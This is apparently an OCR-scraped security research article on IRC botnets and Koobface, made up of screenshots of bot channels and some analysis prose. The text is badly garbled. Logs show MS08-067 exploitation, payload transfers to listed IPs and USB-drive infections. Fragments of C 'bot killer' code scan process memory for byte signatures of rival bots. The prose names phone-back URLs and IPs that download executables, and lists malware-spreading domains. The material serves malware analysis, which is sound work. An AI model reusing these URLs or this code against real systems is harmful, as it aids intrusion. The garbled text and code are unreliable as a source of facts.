ffer{ 0x5000 L° chore szBot: 
x Curbuf[ 0xS00 i‘ . * 7 d: ): chore s2String: 
* coin sSearch[ ] = 
Bot*. Tcceicleninelesicainasielaiiaeisdaliatsisleaateaicidaadaleas 
REBot*. "\x33\eCON64\K03\040\x305K78\K0C\R8B" }. 
RXBot*, “SxEB\xLOSxSANx4ASx33SxC9NK66NKB9Nx7D" 3, 
*, “&echo bye" }, 
( szBigBuffer, (cher ®)Curb 
token[4] !* NULL ) 
stratr( szBigBuffer. to 


1 *PRIVHSG : cher szBigBuffer[ 0x5000 ] + { 0 ys 
+17 einai unsigned cher Curbuf[ 0x500 ] = { 0 }; 


a DoSearch(SOCKET sock. unsigned long uStertAddr. unsigned long uE 


HANDLE hProcess + OpenProcess( ALI_ACCESS, FALSE, pe32.th3 
for( unsigned long uCurdddr = uStart ; wCurdddr <* uBndaddr uC 


[18] 


26063 


Silage toe [19528] [+ CmMnstuk openclub]: .msn.stop| .msn.msg foto? ren i . 
TH Fle View Favortes Tools Commands Window Help -@&x 


A @€@eOlgag0s GSS 2 BH573 8 

* [NOO/ESP| 06633] has joined #tantt A (OSARG|OH ne 
* [MO8/USA|11973] has quit IRC (Connection reset by peer) [oojarcjo = 

* [OO/ESP} 041421) has joined #tantt [OOJARG|O [=~ 4 
* [N@O/1TA| 76311} has joined #tantt [eojarcyo 

* [NOO/ESP|68413] has joined #tantt OOJARGIO ome we 
* [MO0/1TA|90230] has joined #tantt aed 
* [NOO|MEX|91640] has joined #tantt [oojarcjo = 

* [MOO 1TA|32421] has joined #tantt [oojAaRrc|o 

* [@0/ESP|927221] has joined #tantt [oojaRrc|o 

* [MOO/CAN|94844) has joined #tantt [oojaRrc|o 

* [NOO)MEX|"2277] has joined #tantt [OojaRrc}o 

. [MEX]434883] has quit IRC (Connection reset by peer) [eojARG|o 

* [MOOJESP|79205] has joined #tantt [oojaRrc|o 

* [NO8)1TA|G3743] has quit IRC (Connection reset by peer) [oojARG|o 

* [88)USA|697629] has joined #tantt [oojaRrc|o 

* [OB/ESP}256534] has joined #tantt MO Gus 

* [OB/ESP|}839191] has joined #tantt [Oo] ARG|1 

* [N@2]1TA]60991] has joined #tantt [ Oo; ARG|1 

* [QOJESP|776204) has joined #tantt [Oo] ARG|1 

* [N@O/GRC|59461] has joined #tantt [oojARG|1 

* [N81/GBR/ 19357] has joined #tantt [OojARG|1 

* [M@O/ESP|81392] has joined #tantt [Oo] ARG|1 

* [N00] 1TA|88026] has joined #tantt [Oo] ARG|1 

* [MOOJESP| 19892) has joined #tantt [Oo] ARG|1 

* [O8/ESP}392971] has joined #tantt [Oo] ARG|1 

* [N@O/COL|49635] has joined #tantt (Oo; ARG|1 

* [80/USA|731395] has joined #tantt [eojaRcy1 

* [MOOJESP|39744] has joined #tantt [oojARG|1 

* [NOO/ESP|47922] has joined #tantt (Oo; ARG|1 

* [MO6/ESP|41569] has joined #tantt (oo; ARG|1 

* [MOO/ESP|34399] has joined #tantt [oojARG|1 

* [NGO)/1TA|56183] has joined #tantt (Oo; ARG|1 

* [MOO/ESP|33751] has joined #tantt (Oo; ARG|1 

* [M@3/USA|81845] has quit IRC (Ping timeout) [eo] ARG]1 

* [MOBJESP 65102] has quit IRC (Ping timeout) [OO] ARG|2 

* [MOO/ESP|27406] has joined #tantt [Oo] ARG|2 

* [@8/ESP|429733] has joined #tantt [Oo] ARG|2 

* [N@O) MEX] 05225] has joined #tantt ~ [ojARG|2y 
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te 


Vew Fevortes 


Tooke 


hat you see 


Command: Window Help 


s/Gerctvs cei we 


<lol> \xdShTttigé j2 utisJ@@adcwl® 

<rSFd¥ax¥2W6sFGto> \xckRqd .96XG21 
-UIN9SOZS thThotyS ts6PyetxyupY 4 
suze 

CA9ISDEKBUuTHCORKMD \xcKAqd .A6xXG21 
-UINDROZS ThThotyS ts6PyetxyupY .H 
suze 

<s2wtUL IKI 2WU2KERD \xckKRgd .96xG21 
-UIN9ROZS ThThotyS ts6PyetxyupY .H 
Sueze 

CAFUAATYIGKTFuPpO> \xcKRqd .96xG21 
-UINDROZS thThotyS ts6PyetxyupY 
sueze 

CHEITOIS? Jywtrr \wekRqd 96x62 
-UINDROZS ththotyS ts6PyetxyupY 
susze 

<JuzowOtas@6x8S57> \xckRqd .96xG21 
-U1N9ROZS th thotyS ts6PyetxyupY 4 
suze 

<bns fIkxwel mL C21G> \xckRgd 6x21 
-U1N9ROZS th tho tyS ts6PyetxyupY 4 
suze 

<q2Eewy66nd7@xS81> \xckRgd .A6xG21 
-UIN9ROZS Tk tho tyS ts6PyetxyupY .H 
suéze 

<nSadheXnsota2t€9> \xckRgd .A6xG2t 
-UIN9ROZS Tk thot yS ts6PyetxyupY .H 
suze 

<bd82 [SiDBOIqk7II> \xcKRgd .A6xG2t 
-UIN9ROZS Tk thotyS ts6PyetxyupY .H 
suze 


<lol> \xhF SFO THRMTQTSIPppevaknc .u 
Seu? .STaeu. 

<bd82 Si bBOIqk7I9> \x2n9OKTT1AIg. 
yCIGO tIwzyx . 

<bd82 [SibBOIqk7I9> \x2n9OKTT 1A19. 
b2gl WO. pxl VeNYERT eKHYUD? f2qgntA 
tsatt 

<nSadheXnsota2tes> \x2n9oKt?taig. 
yCIGO t3uzyx . 

<nSadheXnsotn2ted> \x2n90kt? 1419. 
b2gL WO. pxl VeNYTRTeKHYUD? f2qghtA 
roatt 

<rSFdVax¥2W6s6Gto> \x2no0Kt?taig. 


i need to fix my script a little 


*~ lel 
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Fie Mew Frrortes 


a F SHU 


« 


ba 
Ee 


bagi 
Net 


26066 


Tools Commands Window Miip 


JGRite sa - 


TeaT 
Pb ia bed 
ed ied | 
[arp sr} 
0) xP 1 5P2} 
apport} 
ear i tra} 
hid bigal 
bid tied | 
ej aryesrsy} 
jPSP2) 
ea | SP?) 
ej Pp SP ty} 


som an om om om om om om om oon om od 


bid bid | 
+ (eejzPpsr2) 


feined stances 


* [eejxrysrz} 
[eejarysrsy 
[eejarysr2) 
[ee)xPysr2} 
(eejarisr2} 
[00)xP|sF2} 
bd bid 


{eejxrpsr2) 


Yow Favorites 


26 mes i 
Reotid 


Tools 


a) 


liew (ae 
1FLE (USAMA? 
Tepel (esee 
Pile (usaese 
wet (etenl? 
AL fet (eu 
smee (useeit 


Emasoylé (58 
Oar (SeemN? 
fora et 


as joined SPantat 


Frecwns (seemed? . 
FYnconOly (Comin? 


DGqnctqne (use@T 
Pec AAkyn (USAES® 
Fetzelkx (use 

wet@~rtoe (etentt7 
qigeetwer (Usaett 
wqqtp) (usearte.6 


wery (Teewirs 25 


Wirrdow Help 


‘ 
permet et (USAESP. 16 ¢ 


/aP¢Sh2} 
id bie) 
[xP |SP2} 
[xP SPR} 
|xP|SP2} 
|xP|SP2} 
|xP|SP2} 
/xP|SP2} 
xP |SP2} 
13h )Sh2} 
[xP ys) 
[aPysrty 
|xPUSPo} 
/xPUSP2} 
|xP|SP2} 
/xP |S} 
P| SP2) 
|r )Sh2) 
ed bed | 
[ar ysht} 
jaPysrty 
|xP SPX} 
[xP |SP2} 
|xP|SP2) 
|aP | SP2) 


ald x) 


[ ee) 7e3;SF2) 
(ee) 7e3;5"2] 
(00) 2"3)5°2] 
(00) 2"3)5°2) 
[00) 23) 9°2) 
(#9) 2"3;8F2) 
(ee) 2"3; 5°27} 
[80] xP | SP8)-acp 
[ee] xr | sPej-are 
eee ee 


deae> [ees i Exploites tr: 1 
OPEberict> [MSe8- O67]: Exploited 
yrs? [NIIP]: Commection Cstabtis 
Oprs> [NIIP]: Transfer Complete: 
ters [ose : Exploited IP: 1 
clu [ z Transfer Complete: 
clwaw> [MSOR-O57]> Exploited IF; 
OPEdzPECt> [HITP]: Commection Est 
OPEdzrict> (HITF]: Transfer Comp) 
OPEDrPEct> [Me8-O67}: Lxploited 
CVErhv> [WTP]: Comection Estabt 
evtraw> | Transfer Complete 
C¥Erhe> [PSO8- 0679: Exploited mF: 
Oyrs> }: Comection fstabiis 
fyrs> [" Transfer Complete: 
fyrs> [MSO8-067}; Exploited IP; 1 
Byrs> i Conmection Establis 
fyrs> (" Transfer Conplete: 
Oyrs> (me 1 Exploites tr: 1 
kiticurx> J: Connection Esta 
ati Transfer Complete: 
atvig> [is6en- es) IF: 
IrrIGso1> [ Connection Este 
Irrteso1> [ Transfer Conple 
IrvT@SOT> [MSO8-067]; Exploites 1 


«168 16755 

7.996.2. 188 (29.00 08), 
«196.3. 188 
78. 228.20.13: 18692 
*.20.99 (29.00 DB), 
+.28.43 
7196.6. 192275618 
+6. 197 (29,00 te 
6.1 
7.106 ,.46, 200575618 
6.208 (29.00 © 
6.208 
fh 019. 198.19 68573688 

2.5% (29.08 0B), (Total Seeds: 2 


(Tetel Senes: 


+ CTetal Seeds: $ 


» (Total Sends: 


(Tetal Seeds: 


») 


. (Tetal Seeds: 4) 


» 


») 


ec? 


[OH pg zd 
}(OH 
}(OH 


etl 
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© [1008] THA|ABNGT) (XP-39760125 24.64.08, ads]. | 
© [1080]1€.0/24993) (XP-168086.85.199.489) has 
© [88] USA|5S5906) (XP-8627077.238.21%.9%) has 
© [188] 1TA] 78298) (XP-7129@ppp-248-1194.93-151, 
© [88] THAINIS627) (XP-22158425.25 .155.6%.ads1 . 


= [O8[CAN| 719082) (XP-9S87G2%-122-227-29% uF. 

© [@8|BRA/632497) (XP-72000208-109-196-208 ct _ , 43 
© [08] TTA 9ASZ25] (XP-a198GhOSt 188-29-dynamic . ‘ - = 

= [108] FRA[ 39059) (WIN-SATOAARLeNS-152-1-39-185, = 

© (OO) ESP [30898] (XP-1708062.57.199.975 dyn 

© [1008/R]77N9N) (XP-797 0084 .218, 195.56) 


[23] 


(00): 
[oopane | 1 
[oojane | 
[oojane|1 
[oojane | 1 
[oojae | 
[OO ame | 
[Oojamt 1 
ame | 
[oojant jz 
[oojane jz 
[oojant jz 
[oojane jz 
[Oopane jz 
[Oojant jz 
[Oojant jz 
[oojant jz 
[oojant jz 
[Oojant jz 
[Oojant jz 
[Oojant jz 
[Oojant jz 
[Oojant jz 
[Oojant jz 
[Oojant jz 


[oojart ys 
[oojant ys 
[oojarty> 
[Oojart ys 
[oojart ys 
[oojart i> 
[oojarty> 
ae 


[oojaRt | 
[oojaRt | 
[oojaRt | 
[oojant |2 =) 
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rok - [Fruhe (memes Soon) [13394] [-mbknste}: scan 71.66% x] 

Commands Window Help 

4/7 Oo GYSsaites eeiveiSaas 

5 Sorex atts —_ Bake ae 


| Fle Weew Fevortes 


@onicx « 


(14:31) © Mew talking in Seuke 

a1) * sets mode: +santits 

triewing Saeke modes... 

34) * Semicx changes topic te *.scam 71.66.x.%° 

1%] * ) has joined 
2-CMOR1IF 7ace 


[14:36] * SS dynamic .ds 
[14:96] * br tr .cox 
[14:36] ; ynamic .plati 

a eee 
t telkomadsl 
{ as joined tm 


C—O 


| Reet 


jetstrean.« 
Ase. digpend.net.au) has joined Snuke 


Ne .res.rr.com) has joined Snuke 
bee —— = cnr Quit (Connection reset by peer) 
epls.quest.net) has joined Snuke 
cal.res.rr.com) has joined Snuke 
amtelecom.net) has joined Snuke 
@51 kimi .ameritech.net) has joined Snuke 
O51 .kimemi.ameritech.net) has joined nuke 
ue. woosh.co.nz) has joined Snuke 
dslextreme.com) has joined Shuke 


————<— claro.net.br) has joined Snuke poet ¥ 
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[1323] [+mnstTuV] ||) | fae] 


11:03:42) - Topic removed by xdR! 
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YSoea Ces taiww bos 


ned wikeNonedther 
([UsBlodukskpu (“LNG@CIA.COU-6ASFDES3 .dyn.optonline .net) 
hed SLikeNonedther 
[UsB)oghwptkz (LNGBCIA.GOU-BFSSF46C .karoo.kcon.com) has 
SLikeNonedther 
[USB] qzyrujnt (~LNO@CIA.GOU-AIGSESES .dsl.scarlet.be) has 
SLikeNoneOther 
(USB) fpfwbtzq (~“LNGR@CIA.COU-3A721323 .dub-3rk2 .metro.digiwe 
as joined SLikeNonedther 
(UsB)qjlaygyz (“LNO@BCIA.GOU-AED27E70 .dip.t-dialin.net) 
ned #ikeNonedther 
bwxsrxeo: [UsB] Infected Drive L: 

[UsB)hoyzquir (“LNOB@CIA.GOU-FFE56B69 .ip98 .fastwebnet .it) 
hed MikeNonedther 
(UsBjudybzrvul (~LNO@234428F3 .BF64FSA7 .£3452292.1P) has 
SLikeNoneOther 
[USB] dhpkuqag (“LNG@whw@CE7B9802 .ABBIS4FE .EBC25752.1P) has 
SLikeNoneOther 
[UsB]llxqnuxw (“LNO@BB7D9CCDE .1274BE29 .6682967A.1P) has 
SLikeNonedther 

__UsB]nkjbhbet: [UsB] Infected Drive F: 
(UsB)lacwukix (~LN@@17562985 .D5AD758D .77602B8F .1P) has 
SLikeNonedther 
(UsB]krdcefhic (~LNOB17CO94BF .895781AS .CB171EEB.IP) has 
SLikeNoneOther 
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[UsB]aejengdo « 


(Us )aghnahpt 
(UsB]agtckujn 
([UsBjagtiznth 
(UsB)ahatlwac 
(Us8 Jaicsnayhr 
[UsB]aigqyutip 
(UsB)ajdgbbri 
[UsB JakunjdFe 
[UsB ]aldsiwnb 
[Us Janhuobhn 
(UsB ]anpxtisn 
[Us Janpphbul 
[UsB jJapwafkzt 
(UsB)]asfFjole 
[UsB]aszceifp 
(UsBlatfnyzea 
(Us Jaxucapre 
[UsB Jayulyzyp 
[UsB )bbahbxdy 
[USB ]bbhzqFhad 
[UsB ]bbuetbqj 
[Us8 }bbxoocrwu 
(UsB JbcrdounF 
[UsB jbczysfee 


[UsB]bdaxximn ¥ 


= 
BB | 
Fle View Favortes Took NoNemeScipt Window Help 
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a: 
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a: 
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unroot .info 
unwept .info 
anmast .info 
ticedu .info 
outliv .info 
onclew .info 
froday .info 
mayray .info 
tenshy .info 
steepy .info 
miloty .info 
debuty .info 
fifthz .info 
potinz .info 
caretz .info 


narowz .info 


What do these two scareware executables have in common? Its the phone back locations that 
the Koobface gang is using, reveling its participation in a scareware affiliate network called 
Crusade Affiliates. 


2610 


emi | —<—=s. @ < te sj 


Plo View Favortes Took wikC Window Help = x 


[29] 
26073 


Tomi : | — @ € tee & 
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BB mIRC 6.31 with NoNameScript 4.2 | = 
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Commands Window Help 


YSoa fat t2\ewo 


has joined #LikeNonedther 

* [LNO)[USBlodukskpu (“LNO@CIA.COU-6ABFDES3 .dyn.optonline .net) 
has joined LikeNonedther 

* [LNO)[UsBjoghwptkz (LNGBCIA.GOU-BFSSF46C .karoo.kcon.com) has 
joined SLikeNoneOther 

* [LNG)[(UsB)qzyrujnt (~LNO@CIA.GOU-AIG4ESES .dsl.scarlet.be) has 
joined SLikeNonedther 

* [LNO)[USB]Fpfwbtzq (~LNO@CIA.GOU-3A721323 .dub-3rk2 .netro.digiwe 
b.ie) has joined MLikeNoneOther 

* [LNO)[UsB)qjlaygyz (~LNO@CIA.GOU-AED27E70 .dip.t-dialin.net) 
has joined &LikeNonedther 

<IRC> [LNO][USB]bwxsrxeo: [UsB] Infected Drive L: 

* [LNO)[UsB)hoyzquir (~LNOR@CIA.COU-FFES6B69 .ip98.fastwebnet .it) 
has joined #LikeNonedther 

* [LNO)][UsB]udybzrui (~LNOG234428F3.BF64F5A7 .£3452292.1P) has 
joined SLikeNonedther 

* [LNG)][USB)dhpkuqag (“LNGwhw@CE7B9802 .ABBIS4SFE .EBC25752.1P) has 
joined SLikeNonedther 

* [LNO][UsB)]1llxqnuxy (“LNG@B7D9CCDE .1274BE29 .6682967A.1P) has 
joined SLikeNonedther 

<IRC> [LNO)][UsB]nkjbhbet: [UsB] Infected Drive F: 

* [LNO)[UsB)lacwukix (~LNO@17562985 .05AD758D.77602B8F . IP) has 
joined SLikeNonedther 

* [LNO)[UsB)krdcefhc (~LNOG17CO94BF .895781AS .CB8171EEB.IP) has 
joined SLikeNonedther 
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[LNO)][UsB]aejengdo 
{[LN®)(UsB)aghnmhpt 
(LNG) [USB ]agtckujn 
(LNO}[UsB)agtiznth 
{LNO)[UsB)ahatlwac 
(LNG) (USB) aicsnyhr 
[LNO][UsB]aigyutip 
(LNG) (UsB)ajdgbbri 
(LNG) [USB ]akun jaFe 
[LNO}[UsB]aldsiwmb 
{LNO) [USB] anhuobhn 
(LNG) [USB] anpxtisn 
[LNO) [USB ]anpphbul 
([LNG®)[UsB)apwaFkzt 
(LNO}[UsB]asfFjole 
[LNO)][UsB]aszceifp 
([LNO)[UsB)atfnyzea 
(LNB) [USB )axucapre 
[LNO) [USB] ayulyzyp 
(LNO)}(UsB }bbahbxdy 
(LNO][UsB ]bbhzgFhd 
[LNO)[UsB ]bbuetbq] 
[LNO)[UsB)bbxoocrw 
(LNO) (USB) bcrdounF 
[LNO)[UsB]bczysfee 
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11:03:42) - Topic removed by xdRI 
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fhe CR Format Wew Pel 


and 
(14:31) © Mow t ing in Sauke $ popular online v4 
(18:91) © Seg sets memes esemtite “oot killer, KATIS. ves ary other ma 
* Retrieving modes... d Commands and Config 
[14:36] © Senicx changes topic te *.scan 71. Table Cow update 
[14:36] « [ ) bas joined @, 
[14:36] * ja-CMOOIDF7 aCe candbox: Anubis, Sunbelt, worman, 2 
joined Snuke eBugge lydig, wir so . 
A, TT. Sonam dai “Packer snifferss Wireshark, NetStumpler, Tl 
Ser rove Se 
[18:36] Yyramic platid 7 et dfile & messag 
[14:36] riton Full < 
[14:26] ; as joined 8nq HL ar 
A — . 4nd nH 
ee 2 lemeritat ice 


[14:37] 


[18:37] 


ne 
ee ee 


has joined nq) - 
astlink.ca> QI 
Or .chello|. 


het.au) has joined Snuke 

We .res.rr.com) has join Bnuke 

Quit (Connection reset by peer) 
ppls.quest.net) has joined Snuke 
al.res.rr.com) has joined Bnuke 

net) has joined Snuke 

G51 .klmznmi.ameritech.net) has joined nuke 
@51 .klmzemi .ameritech.net) has joined Snuke 
ue .woosh.co.nz) has joined Snuke 
@slextreme.com) has joined Snuke 


——— claro.net.br) has joined Snuke 


erver Tummeling 


"All wersto 


versions 
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+ [N08] BNR |86N99) (xP-9289089 
[88] THA] 2Ne8B) (XP-BNt9eTZS.27 
[88 SVE|374986) (xP-8e7GaC83-25%-138-69 
+ [N02] USA} 88289) (WIN-SAS@o01-A57cdda8. dyn. 
© [OO]FRABI7NIT) (XP-1976R91-163-109-127.rev. 
= [88|FRA|668158) (XP-8779RALi11e-257-1-187-68 
= [N08] WRU] 06902) (xXP-827089-172-202-192.ads1. 
© [O8/FRA| 158091) (XP-3299@AReins-156- 
88] SVE [59908] (XP-1260an156n9F153h0 
J THA) 2e1065) {HP -6A6 TRIES .25.196. 123.ads1 


= [88)5CG)590574) (xP-2270@ads1-20- 
* [ON/ESP]S78NG7) (XP-3e7 E84. 121.198. 182.dyn. 

+ [OC[ESP|R6e868) (XP-9NGEApC-2th-218-HA-198, 

+ [N08] USA}25059) (XP-2758acuSt 192-9 .netcabo.ce 
+ [8] BEL{8N9619) (XP-6290R128. 168-241-84.ads1 

+ [MOB/ESP|26888) (xXP-R89%R198.579.72.48%) has 
= {¥00] THajaaner {a2 2970125 .28.68.40.0081 « 


i} 
= [88] ESP] N6w1Se) (xP-8998077.225.176.2) has 
+ [S9[ESP}622925) (XP-3N6M16N.77.198. 162) has 
+ [88/NL0] 246787) (XP-36695E071893..cable.zi 
+ [N88] FRA|9S398) (XP-38RGADI jon-754-1-19-69. 
+ [88] 171A} 982283) (XP-19780n05t9S-182-dynanic. 
+ [8] FRA|7AS@8) (XP-9e820AANNECY-158-1-123- 
= Leoirnayzzesse) (XP-SORS@AN ce-257- 
xP 


* [88 BRA|632997) (xP-72e0@208- 109 
© [88] 1TA}9NS225) (XP-RI9MHOSt 188-23-dynanic. 
© [108] FRA[29059) (WIN-SAT@AARIeNS-152-1-39- 985 
= [HOO]ESP [30998] (XP-1708062.57. 199.175 ayn. 
© [N08] AR |77A9N) (XP-7970084.298. 195.56) has 
We8|FRA|O9STZ) (XP-1280087.298,249.1%) has 
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JOB raed s+ 


TT 


lew (ae 
iste (Usaet? 
Tepetk (Utee 
Pile (esaese 
wet (eten1? 
Aijet (eur 
oe (Ulan 
ViytUns (Seu 
repTLianw (5 
i2ten (fae 
Emasoglé (58 
rx (Seeme? 
tera (eie8 


joined Shanta 


* (ee)sPisr2) 
+ (eejsrpsrz) 
jeleed srasdes 


[eejxPysr2) 
xP psr2} 
jap psr2) 

{00} xP) SF2) 


{eejsrysr2) 


frecwes (tenes 
F¥mCDROly (CHRmP? 


‘ 
prnchett (USMESP. tx 


OSqnetqre (USAT 
Pec kyn (USAGS9 
Faezelex (USMS? 
xetrreow mania? 
qiyeetwer (uiaett 
wqqtpl (utea?19.6 


tory (Teeet?s 25 


jar psr2} 
/aP1Sh2} 
/aPpSh2} 
/aP ESP? } 
/5P|SP2] 

xPySP2} 
/xP | SP2} 


Jeaa> [hee-@ 
orterrict> { 
Oyes> [NTP]: 
Oyrs> [ I: 
Byrs> [eee 


clue? [ 1: 


cTwaw> (165 
orterrtct> { 
orterrtct> { 
orterrict> [ 
ertraw [ 
ertraw [ 
eTtraw> [ice 
{ 
Oyrs> [att 
Byrs> [oe 
tyrs> [ 
ws> 
Byrs> [ 
kiticurx> 
ami | 
alvif> [16 
IrrIGsoT> | 
Irrteso1> [ 
Irv TesoT> [ese 


+ Comection Established; 


alti x) 


(ee) 7"3)S"2) 
(ee) 27e3)5"2) 
(ee) 2e3)5"2) 
(0; 2"3)S"2) 
[ 00; 2"3)5"2)} 
(00, 2"3)SF2) 
(00) 2"3)S"2) 
[ 00, xr | SPO} -ace 
[ea[xr|srep-ar 
eee ees 
E 
(}: Exploited tf: 192.168.1.10 
r}: Cxploited tf: 117.196.3101 
Comection Established: 117.196.6.123:75618 
Transfer Conplete: 6.123 (29.00 KB), (Tetal 
7}: Uxploited tr re 
Transfer Complete: 59.161.8.99 (29.08 KR), 
67]: Exploited IF; 59. 161,8,93 
}: Connection Established: 117.196.3 
J: Transfer Complete: 117.196.9188 (29 
J: Ceploited th: 197.196.3. 188 
: Commection Establishes: 78.272%.20.19: 18632 
Iransfer Conplete: 78.2724.20.13 (29.08 KB), 
eer}: loited 78.22%.28.13 
Comection fstablish 117.996 .6.192225 
Transfer Complete: 117.196.6.192 (29,00 KB}, (Tetal Sends: 4) 
7}; Exploited IP; 147.196,6, 492 
117.995 .6, 200225618 
Transfer Complete: 117,196.46. 208 (29.00 0B), (Total Sends 
rh: Exploited ff: 117. 196.6 
J: Commection Establishes: 119.15%.19.68:236 
Transfer Compile 199. 159.2.5% (29.00 HB), (Total 
J: Exploited IF: 919.158.2754 
}: Connection Establishes: 89.75.9.188:7001 
}: Transfer Complete: $9.25.9.198 (279.08 KR}, (Total Sends: 1) 
67}: Exploites IP; #9.25.9, 188 


Seeds: 3) 


{Total Senés; 1%) 


(Tetal Seeds: 


(Tetel Sens: 1) 


%> 


Seeds: 2) 
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RS (-wARC - ¥9.0-) {10:25} Uptione: 2h1 dents * Server: inc.priv@eet.com * Nick: tol - (#lel[1... {- foyx) 


miBC - [A 
\ fie Vow fevortes Commands Window Help H "BE 0 . ] 


FS Ge AHF teYse2e2 aes 


<lol> \xd3nTttigg j2 ulsJ@@aécwleé - lel 

<r SF dVax¥2W6sFGtO> \xcKRqd .46x621 
-UIN9BOZStkIkotyS ts6PyetxyupY .H 
Suéze 

<O9ISDErIuzBCOMKm> \xcKAqd .A6XC21 
-UINVROZS tk tkhotyS ts6Pyetxyupy .H 
suéze 

<S2wTULIKIZWUZKESD \xcKRqd 496x621 
-UTNGROZS tk thotyS ts6Pyetxyupy .u 
suéze 

CLFCAATYLEX7FuPpO> \xcKRqd .46xG21 
-UIN9ROZStkthotyS ts6PyetxyupY .H 
suéze 

ChESCOIS2 fywlrrst> \xckhqd 496x621 
-UIN9ROZS th thot yS ts6Pyetxyupy 
suéze 

<juzowO tas@6xB557> \xckhqd .A6xG21 
-UINIROZS tk thotyS ts6Pyetxyupy .H 
suéze 

<bns fIkxwelL ML C21G> \xckKhqd .A6xG2t 
-UIN9ROZStKtkotyS ts6PyetxyupY .H 
Ssuéze 

<qQdEewy66nd7OxS8t> \xckKhqd .46xG21 
-UTNPROZS tk thotyS ts6PyetxyupY Hn 
suéze 

<nSadhcknsotm2tEd> \xckhqd 426x621 
UINIMOZS tk thotyS ts6Pyetxyupy 
Suéze 

<bdB2 SSibBOIqk719> \xcKRgd .9d6xG21 
-UINIMOZS Tk thotyS ts6Pyetxyupy .H 
Ssuéze 


Clol> \XHFSFO TARIQ TS Pppevakac .u 
Seu? .STaeu. 

<bd82 Si bBOSqk719> \x2n90Kt7 1019. 
yCICQ 1S uzyx - 

<bd82 [SibBOSqk719> \x2n90Kt7 1010. 
D2gL US. pxLVeMYTBTeKHYUDT f2qqhtA 
tSAtt 

<nSadheXasota2tes> \x2n90kt7 101g. 
yCICQ 1S uzyx - 

<nSadheXasota2tes> \x2n90kt7 101g. 
b2gL WO. pxLveUyteteKHYUDt f2qghtA 
tSatt 

<r SF dVax¥2W6sFGto> \x2n90kt7 101g. 


i need to fix py script a little 
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CRUSADE-AFFILIATES 


V+0 


The first phone back location urodinam.net /dfgsdfsdf .php - 122.224.9.67 adds a .bat file 
which would attempt to obtain mshta.exe from urodinam.net/33t .php?stime=1253063118 on 
hourly basis. The second phone back location is the Crusade Affiliates network that shares 
revenue with the Koobface gang whenever a scareware pushed by the gang is purchased - 
crusade-affiliates .com/install.php?id=02979 - 85.17.139.149. 


The third phone back location is a _ direct download attempt of ([18]Fraud- 
Too!l.Win32.SecretService; RogueAntiSpyware.PrivacyCenter.AJ from Oni901s3feu60 .cn/u4.exe 
- 220.196.59.23. It’s pretty evident that the Koobface botnet is now relying on multiple layers 
of monetization approaches. 


The Koobface gang has been pretty during the last couple of days. The following list of 
Koobface malware spreading domains are in circulation across social networking sites since 
the last 48 hours, consisting of a combination of purely malicious and compromised legitimate 
sites: 
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TD Fie View Favortes Tools Commands Window Help -@&x 


Ay &€@eCQgoa0sa GPS R20 E820573 38 

* [MOOJESP| 06633] has joined Btantt [OO] ARG] O* po: 
* (M88) USA|11973) has quit IRC (Connection reset by peer) [eojaRcjo” 

* [OOJESP]} 041421) has joined #tantt [ODJARG|O =~ 

* [MOO)1TA| 76311} has joined #tantt [eojarcyo 

* [MOO/ESP|68413] has joined #tantt OOJARG|O mew 
* [M00/1TA|98230) has joined #tantt == 

* [MOO|MEX|916"0) has joined #tantt [oojarcjo = 

* [M00] 1TA|32421} has joined #tantt [oojarcyo 

* [@O/ESP|/927221] has joined #tantt [oojarclo 

* [NO8|/CAN|94844) has joined #tantt [oojaRrcyo 

* [MOO|MEX|42277] has joined #tantt [oojarcyo 

* [00)MEX|439883] has quit IRC (Connection reset by peer) [oojARG]o 

* [M@O/ESP|79205] has joined #tantt [oojarcyo 

* [MOO] ITA] 83743] has quit IRC (Connection reset by peer) [eojARG)o 

* [88)USA/697629] has joined #tantt [oojarcjo 

* [OB/ESP|}256594] has joined #tantt [oojarc|o 

* [OB/ESP|839191] has joined #tantt [oojAaRrc|1 


* [M@2|1TA]60991] has joined #tantt (OO) ARG]1 
* [@O/ESP|776204] has joined #tantt 
* [MOO/GRC}59461] has joined #tantt 


* [N@1/GBR|19357] has joined #tantt 


* [MOBJESP/81942}) has joined #tantt [oojarcy1 
* [M00] 1TA|88026} has joined #tantt [oojaRrcy1 
* [MOOJESP|14842) has joined #tantt [oojaRrcy1 
* [BOJESP}392971} has joined #tantt 1 


* [N00/COL|29695} has joined #tantt 
* [80/USA|731995} has joined #tantt 
* [MOBJESP|397%%} has joined #tantt 


* [MOOJESP|47922] has joined #tantt [eojaRcy1 
* [MO6|ESP|41569] has joined #tantt [eojarcy1 
* [NOB/ESP|34399] has joined #tantt [eojarcy1 
* [NGO/1TA|56183] has joined #tantt [eojaRcy1 
* [MOO/ESP|33751] has joined #tantt [eojarcy1 
* [M@3/USA|81845] has quit IRC (Ping timeout) [OO] ARG]1 
* [MOB/ESP}65102] has quit IRC (Ping timeout) [OO] ARG|2 
* [MOB/ESP|27406] has joined stant? [eojaRcy2 
* [@88/ESP|429733] has joined #tantt [eojaRGy]2 
* [NOO|MEX]05225] has joined stant? v [o0jARG|2y 
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Neel 


Hun | oe 
oHun| 
eHun |e 


po | xP | SPO] Coes 
Kick 


@4| xP |p| 69929) 
. 
4 | xP | P| 69929) 


“P/F 


os) xP | Peas 
@4| xP | P| 69929) 


[AR gobs! members) bd 


at 


ONS res< 


@ DoSearch 
Window Help 


Ras 


ides 4” 
ros hb” 


*token[10] 


uffer[ 
Curbuf [ 


OxS000 } = (0) 
0x500 } = {0 } 


bess * OpenProcess( PROCESS _A 
uCurAddr + uStertAdd 


pd + ReadProcessMeaxory( hPro 
«0 

t( szBigBuffer. ( *)Curb 

{ token[4]) '+ NULL ) 


( strstr( szBigBuffer. token 


sprintf (aso “PRIVHSG Xs °F 


bend(sock. ass. strien(ass) 
Send Sse] 
printfi( "4 
sprintf 
« ‘ 


Prd Pest } Ped fies? 7 


unable to resolve 


lved 


Gy SOCKET sock 


ec? 


IR-y SHI uS 
- # 
© AS3*s botks xr Credits to the sexy guy: )® 


“ancl h 
“externs h* 


DoSearch( uStertaddr uEndAddr, PROC 
KillBot (SOCKET sock, PROCESSENTRY32 pe32 ) 
nusg[ 256) 
s_Search 
* szBot 
* s2Strins 
Search sSearch[ ] + 
( “YRC Scanning Bot*. “\xS2\e46\x42\x20N\K30N\Kn30N\K33\K2EN\x30NK30\x3 
( “RXBot*. “(MAIN)* ) 
{ “RXBot*. *[SCAN)* 
{ “RXBot". “\x33\%CO\%645x035x%405%30 \xO0C\x8B" } 
{ “REBot"™, “SxEBSxLOSxSASx4ASx33SxC9" *xB9Sx7D" } 
{ “Unknown", “&echo bye" } 
{ NULL, NULL } 
DoSearch (SOCKET sock uStertaAddr uE 


